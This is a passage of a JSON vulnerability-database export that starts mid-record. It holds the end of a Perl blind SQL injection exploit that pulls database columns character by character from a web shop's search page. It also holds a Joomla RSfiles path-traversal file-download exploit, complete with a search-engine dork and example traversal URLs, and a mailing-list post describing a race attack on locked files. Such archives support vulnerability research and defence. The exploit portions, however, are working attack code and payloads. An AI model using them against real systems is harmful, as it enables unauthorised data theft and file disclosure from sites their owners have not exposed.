1);\r\n }\r\n $h++;\r\n }\r\n }\r\n}\r\n\r\nprint \"\\n[!] Exploit done\\n\";\r\n\r\nsub istrue2\r\n{\r\n my $host = shift;\r\n my $path = shift;\r\n my $table = shift;\r\n my $uid = shift;\r\n my $i = shift;\r\n my $h = shift;\r\n\r\n my $ua = LWP::UserAgent->new;\r\n my $url = \"http://\".$host.$path.\"index.php?l=search_list&s[title]=Y&s[short_desc]=Y&s[full_desc]=Y&s[cid]=\".$cat.\")%20AND%20SUBSTRING((SELECT%20\".$column.\"%20FROM%20\".$table.\"%20WHERE%20id=\".$uid.\"),\".$i.\",1)=CHAR(\".$h.\")/*\";\r\n\r\n if($options{\"p\"})\r\n {\r\n $ua->proxy('http', \"http://\".$options{\"p\"});\r\n }\r\n\r\n my $response = $ua->get($url);\r\n my $content = $response->content;\r\n my $regexp = \"Add To Cart\";\r\n\r\n if($content =~ /$regexp/)\r\n {\r\n return 1;\r\n }\r\n else\r\n {\r\n return 0;\r\n }\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2086"}, {"lastseen": "2018-04-11T11:50:46", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-08-23T00:00:00", "published": "2007-08-23T00:00:00", "id": "1337DAY-ID-2082", "href": "https://0day.today/exploit/description/2082", "type": "zdt", "title": "Joomla Component RSfiles <= 1.0.2 (path) File Download Vulnerability", "sourceData": "====================================================================\r\nJoomla Component RSfiles <= 1.0.2 (path) File Download Vulnerability\r\n====================================================================\r\n\r\n\r\n\r\n*******************************************************************************\r\n# Title : Joomla Component RSfiles <= 1.0.2 (path) Remote File Download Vulnerability\r\n# Author : ajann\r\n# Contact : :(\r\n# S.Page : http://www.rsjoomla.com\r\n# $$ : 10 $\r\n# Dork : inurl:\"/index.php?option=com_rsfiles\"\r\n# DorkEx : http://www.google.com.tr/search?hl=tr&q=inurl%3A%22%2Findex.php%3Foption%3Dcom_rsfiles%22&btnG=Ara&meta=\r\n\r\n*******************************************************************************\r\n\r\n[[Remote File]]]---------------------------------------------------------\r\n\r\nhttp://[target]/[path]//index.php?option=com_rsfiles&task=files.display&path=[File]\r\n\r\nExample:\r\n\r\n//index.php?option=com_rsfiles&task=files.display&path=..|index.php\r\n//index.php?option=com_rsfiles&task=files.display&path=..|..| etc..\r\n\r\n[[/Remote File]]\r\n\r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n# ajann,Turkey\r\n# ...\r\n\r\n# Im not Hacker!\r\n\r\n\r\n\n# 0day.today [2018-04-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2082"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "During file operations conditions exist for attacker to gain access to content of protected or locked files. It's also possible to create unmanageble file.", "modified": "2007-03-10T00:00:00", "published": "2007-03-10T00:00:00", "id": "SECURITYVULNS:VULN:7357", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7357", "title": "Microsoft Windows files and folders management problems", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "\r\nHello lists, hello Roger. It's me again.\r\n\r\nSorry for annoyance, but there is one more attack vector with pre-open\r\nfiles I meant, but forgot to mention. It seems dangerous enough and need\r\nto be investigated for different applications. Attack is against\r\napplication relying on mandatory locks.\r\n\r\nAttack scenario:\r\n\r\n1. Alice pre-opens some Document and awaits Bob to open it. Document is\r\nsafe to open (text file, video file, business application format, etc).\r\nAlso, like in case of Microsoft Word it can be temporary file.\r\n2. Bob opens Document with some Application.\r\n3. Application locks file and reads or writes some data\r\n4. Alice modifies data\r\n5. Application reads previously accessed data. Because application\r\nrelies on the fact data can not be modified in locked file, this data is\r\nnot validated. It can lead to the problems like buffer overflows and to\r\nability to modify execution flow and to arbitrary code execution.\r\n\r\nWhat can be instead of Application? Any application to process user\r\nsupplied file which locks this file during processing.\r\n\r\nExamples are: Microsoft Office applications, video/audio players, etc. I\r\nexpect huge number of applications are vulnerable and will be grateful\r\nto everyone who can help me to find this kind of vulnerabilities\r\nin-the-wild, because this kind of vulnerability is not trivial and hard\r\nto catch without source code analysis.\r\n\r\n-- \r\nhttp://securityvulns.com/\r\n /\_/\\r\n { , . } |\\r\n+--oQQo->{ ^ }<-----+ \\r\n| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)\r\n+-------------o66o--+ /\r\n |/", "modified": "2007-03-10T00:00:00", "published": "2007-03-10T00:00:00", "id": "SECURITYVULNS:DOC:16304", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16304", "title": "Pre-open files attack agains locked file", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
